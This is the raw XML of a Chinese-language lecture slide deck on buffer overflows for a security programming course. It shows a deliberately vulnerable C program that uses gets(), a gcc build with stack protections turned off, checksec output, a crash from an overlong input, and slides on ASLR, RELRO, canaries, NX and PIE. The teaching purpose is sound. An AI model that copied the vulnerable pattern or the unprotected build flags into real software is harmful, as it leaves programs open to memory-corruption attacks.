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E7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ACA"/>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:wholeTbl>
    <a:band2H>
      <a:tcTxStyle b="def" i="def"/>
      <a:tcStyle>
        <a:tcBdr/>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="F1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DCD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737572"/>
        </a:fontRef>
        <a:srgbClr val="7375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37572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="254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37572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="254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5D4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3757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3757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37572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round/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="127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solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="737572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round/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="127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solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideV>
        </a:tcBdr>
        <a:fill>
          <a:solidFill>
            <a:srgbClr val="737572">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
        </a:fill>
      </a:tcStyle>
    </a:firstCol>
    <a:lastRow>
      <a:tcTxStyle b="on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round/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="127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solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="73757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round/>
            </a:ln>
          </a:left>
          <a:right>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:right>
          <a:top>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:top>
          <a:bottom>
            <a:ln w="254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solidFill>
                <a:srgbClr val="737572"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
          </a:insideH>
          <a:insideV>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="73757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n-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="228600" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="457200" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="685800" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="914400" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="1143000" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="1371600" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="1600200" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="2400">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="1828800" defTabSz="914216" latinLnBrk="0">
      <a:defRPr sz="24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ayout 0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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-311917" y="1429029"/>
            <a:ext cx="10342127" cy="2149184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-207417" y="951940"/>
            <a:ext cx="9732034" cy="21491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Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23200061" y="991195"/>
            <a:ext cx="550767" cy="39766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1880850" y="1234440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ayout 0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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="-8670991" y="-1642101"/>
            <a:ext cx="24377651" cy="980963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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="9220727" y="5158592"/>
            <a:ext cx="24377651" cy="106109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11880850" y="1234440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" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23187719" y="13335595"/>
            <a:ext cx="550767" cy="39766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" name="Picture Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="24377650" cy="92918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" name="Picture Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-2"/>
            <a:ext cx="7029854" cy="1188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" name="Picture Placeholder 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16928121" y="0"/>
            <a:ext cx="7449529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/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11880850" y="1234440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ub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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="-8875760" y="-953529"/>
            <a:ext cx="24377651" cy="54061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ub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Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18898813">
            <a:off x="9189494" y="8581966"/>
            <a:ext cx="24377651" cy="7434266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumOff val="-13999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Picture Placeholder 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="pic" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6370010" y="0"/>
            <a:ext cx="37111320" cy="141455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Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-112812" y="-1"/>
            <a:ext cx="24487287" cy="13913704"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19842001">
            <a:off x="1225675" y="5817257"/>
            <a:ext cx="28992830" cy="126421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23111057" y="564820"/>
            <a:ext cx="704091" cy="7289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3" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23200061" y="991195"/>
            <a:ext cx="550767" cy="39766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5pPr>
      <a:lvl6pPr marL="5180563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6pPr>
      <a:lvl7pPr marL="6094780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7pPr>
      <a:lvl8pPr marL="7008997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8pPr>
      <a:lvl9pPr marL="7923215" marR="0" indent="-60947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108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548530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6399519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731373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longld/peda" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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JonathanSalwan/ROPgadget" TargetMode="Externa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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23371741" y="56482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6" name="Picture Placeholder 3" descr="Picture Placeholder 3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07" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3176" y="-1"/>
            <a:ext cx="24377651" cy="9291896"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">
              <a:alpha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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="9291894"/>
            <a:ext cx="24377650" cy="4424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TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033021" y="11273112"/>
            <a:ext cx="208638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Hawkin Huang</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="112" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2033020" y="1471868"/>
            <a:ext cx="20311591" cy="132485"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="20311590" cy="132484"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="110" name="Rectangle 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="20311590" cy="1324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Rectangle 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="-1"/>
              <a:ext cx="1838943" cy="13248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5" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2033020" y="3605652"/>
            <a:ext cx="9256451" cy="2215879"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9256449" cy="2215878"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="600438"/>
              <a:ext cx="9256450" cy="161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0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Buffer OverFlow</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="114" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="4383768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Security Programming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Placeholder 3" descr="Picture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683" y="-26506"/>
            <a:ext cx="7029853" cy="1188031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Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1668683" y="-26506"/>
            <a:ext cx="7029854" cy="11880313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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6" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11252151" y="3359293"/>
            <a:ext cx="7352815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Buffer OverFlow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11156547" y="6087507"/>
            <a:ext cx="9433380" cy="238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>
            <a:lvl1pPr defTabSz="1087636">
              <a:lnSpc>
                <a:spcPts val="5500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="4800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>程式未對使用者輸入做邊界檢查，導致資料可以複寫超過可控範圍，導致程式執行發生未預期的錯誤。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="#include &lt;stdio.h&gt;…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1784849" y="3378730"/>
            <a:ext cx="6797521" cy="506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48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8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F8C555"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;stdio.h&gt;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4800">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC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sz="4800">
                <a:solidFill>
                  <a:srgbClr val="F08D4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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CC99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="CCCCCC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>){</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="CCCCCC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC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99CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:t> buf[</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC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F08D49"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:t>(buf);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="457200">
              <a:defRPr sz="4800">
                <a:solidFill>
                  <a:srgbClr val="CC99CD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F08D49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4800">
                <a:solidFill>
                  <a:srgbClr val="CCCCCC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Q&amp;A"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10691497" y="6075679"/>
            <a:ext cx="2988306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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23310473" y="564820"/>
            <a:ext cx="45934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1" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3176" y="7162800"/>
            <a:ext cx="24377651" cy="65559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root@Ubuntu : tmp ➤ gcc -o bof bof.c --no-pie -fno-stack-protector -z execstack…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192059" y="2196525"/>
            <a:ext cx="19987182" cy="781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gcc -o bof bof.c --no-pie -fno-stack-protector -z execstack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checksec bof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  <a:r>
              <a:rPr b="1">
                <a:solidFill>
                  <a:srgbClr val="4324D4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:t>] '/tmp/bof'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Arch:     amd64-64-little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RELRO:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="969600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial RELRO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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    Stack:    </a:t>
            </a:r>
            <a:r>
              <a:t>No canary found</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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NX:       </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B12513"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NX disabled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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    PIE:      </a:t>
            </a:r>
            <a:r>
              <a:t>No PIE (0x400000)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    RWX:      </a:t>
            </a:r>
            <a:r>
              <a:t>Has RWX segments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4D2F2D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./bof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RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR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Segmentation fault</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="}"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10229339" y="1763642"/>
            <a:ext cx="1482661" cy="504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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="檢查該程式有什麼保護"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12137697" y="4361129"/>
            <a:ext cx="46761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檢查該程式有什麼保護</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="程式執行之後給他塞滿ＲＲＲＲＲＲＲＲＲＲ"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11681253" y="10642807"/>
            <a:ext cx="92481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程式執行之後給他塞滿ＲＲＲＲＲＲＲＲＲＲ</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="15658920" y="9184660"/>
            <a:ext cx="1" cy="1225100"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127000">
            <a:solidFill>
              <a:srgbClr val="FF26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記憶體區段錯誤"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505157" y="10642807"/>
            <a:ext cx="3304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記憶體區段錯誤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5157427" y="9646029"/>
            <a:ext cx="1" cy="726441"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127000">
            <a:solidFill>
              <a:srgbClr val="FF26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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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1" name="Picture Placeholder 3" descr="Picture Placeholder 3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2" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15357181" y="-1"/>
            <a:ext cx="7029855" cy="11880312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6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Rectangle 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2953842" y="966303"/>
            <a:ext cx="7231248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7200">
                <a:solidFill>
                  <a:srgbClr val="333B3B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>系統保護</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874664" y="2410121"/>
            <a:ext cx="11497813" cy="3259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4800"/>
            </a:pPr>
            <a:r>
              <a:t>ASLR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4800"/>
            </a:pPr>
            <a:r>
              <a:t>/proc/sys/kernel/randomize_va_space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1042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4800"/>
            </a:pPr>
            <a:r>
              <a:t>0 =&gt; 無</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1042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4800"/>
            </a:pPr>
            <a:r>
              <a:t>1 =&gt; 部分</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1042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4800"/>
            </a:pPr>
            <a:r>
              <a:t>2 =&gt; Full</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="RELRO:    Partial RELRO…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15405721" y="6374424"/>
            <a:ext cx="6932772" cy="25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RELRO:    </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="969600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Partial RELRO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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack:    </a:t>
            </a:r>
            <a:r>
              <a:t>No canary found</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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NX:       </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="B12513"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NX disabled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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PIE:      </a:t>
            </a:r>
            <a:r>
              <a:t>No PIE (0x400000)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="4D2F2D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D2F2D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RWX:      </a:t>
            </a:r>
            <a:r>
              <a:t>Has RWX segments</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="程式保護"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2968239" y="5751827"/>
            <a:ext cx="3761741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>
                <a:solidFill>
                  <a:srgbClr val="333B3B"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>程式保護</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Subtitle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2874664" y="7041594"/>
            <a:ext cx="11497813" cy="518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4800"/>
            </a:pPr>
            <a:r>
              <a:t>RELRO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4800"/>
            </a:pPr>
            <a:r>
              <a:t>    GOT不可寫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4800"/>
            </a:pPr>
            <a:r>
              <a:t>Stack Canary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4800"/>
            </a:pPr>
            <a:r>
              <a:t>    不可覆蓋ebp/rbp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4800"/>
            </a:pPr>
            <a:r>
              <a:t>NX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4800"/>
            </a:pPr>
            <a:r>
              <a:t>    可寫不可執行，可執行不可寫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4800"/>
            </a:pPr>
            <a:r>
              <a:t>PIE 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4800"/>
            </a:pPr>
            <a:r>
              <a:t>    CODE片段的ASLR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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="23301109" y="56482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0" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3176" y="7162800"/>
            <a:ext cx="24377651" cy="65559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Rectangle 8"/>
